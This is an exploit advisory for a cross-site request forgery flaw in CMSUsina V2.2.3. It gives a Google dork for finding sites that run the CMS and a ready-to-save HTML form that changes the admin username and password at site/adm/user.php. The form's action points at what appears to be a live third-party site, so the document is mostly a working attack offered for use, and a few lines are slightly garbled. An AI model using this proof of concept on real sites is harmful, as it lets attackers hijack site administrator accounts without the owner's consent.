==================================================================================================================================== | # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://www.ysy.com.br/ | | # Dork : "Desenvolvido por Usina da Criação" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code Edit admin . [+] Go to the line 3. [+] Set the target site link Save changes and apply . [+] infected file : site/adm/user.php. [+] http://127.0.0.1/site/adm/user.php [+] save code as poc.html . <p>Alterar seus dados de acesso</p> <fieldset><legend>ALTERAR DADOS</legend> <form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit"> <label><b>Usuário</b></label><br /> <input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label> <b>Confirmar usuário</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br /> <br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br /> <br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br /> <br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- fim conte?do --> </div> </td> </tr> </table> </body> </html> Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | ===============================================================================